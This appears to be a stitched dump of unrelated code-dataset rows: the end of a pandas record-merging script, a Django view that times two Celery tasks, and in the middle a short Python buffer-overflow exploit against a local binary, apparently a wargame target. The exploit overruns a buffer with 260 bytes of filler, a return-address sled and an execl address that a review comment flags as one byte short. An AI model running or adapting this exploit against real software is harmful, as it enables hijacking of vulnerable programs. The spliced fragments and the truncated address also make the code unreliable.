    # NOTE(review): "homogonous" and "Carlsen" look like typos in the demo
    # output; left byte-identical to preserve the original behavior.
    print("Carlsen Jensen complete record after pulling from 400 homogonous storage arrays:")
    print(excel_data_df_2)
    print("Time to complete: ")
    print(time.time() - curr_time)
    print("Carlson Jensen records fully merged, ready to be used for later analysis!")
    return
if __name__ == "__main__":
main() |
13,198 | fdcc3e87b79171e59441e65767bd6e26d8ed8885 | import os
from struct import *
# Buffer-overflow proof of concept: builds an oversized argv[1] that
# overruns a fixed-size buffer in the target binary to hijack control flow.
target = "/home/dark_stone/cruel"
payload = ""
payload += "A"*260  # filler bytes up to the saved return address
payload += "\x51\x84\x04\x08" * 7 # ret sled
# NOTE(review): this is only 3 bytes; a 32-bit little-endian address
# needs 4 -- confirm the intended execl address is complete.
payload += "\x68\x2d\x83" # execl's address
# Replace this process with the target, passing the payload as argv[1].
os.execv(target, [target, payload])
|
13,199 | 606f93fc23759039dcca5b6b328bd43949e5f615 | # from django.shortcuts import render
# Create your views here.
from .tasks import gen_num, gen_letters
from django.http import HttpResponse
from django.views import View
import time
from .models import Poll
from django.contrib.auth.models import User
class TestCelery(View):
    """Smoke-test view: times two Celery tasks and writes one Poll row."""

    def get(self, request):
        # NOTE(review): .delay().get() blocks the request until the worker
        # finishes, which defeats the purpose of queueing -- presumably
        # intentional here so the elapsed time of each task can be printed.
        print('started test1')
        print(time.perf_counter())
        res = gen_num.delay().get()
        print('result is ', res)
        print(time.perf_counter())
        print('started test2')
        print(time.perf_counter())
        res2 = gen_letters.delay().get()
        print('result2 is ', res2)
        print(time.perf_counter())
        # NOTE(review): assumes a user with pk=1 exists; raises
        # User.DoesNotExist otherwise -- confirm against fixtures.
        user = User.objects.get(pk=1)
        Poll.objects.create(question='2222', created_by=user)
        return HttpResponse('done')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.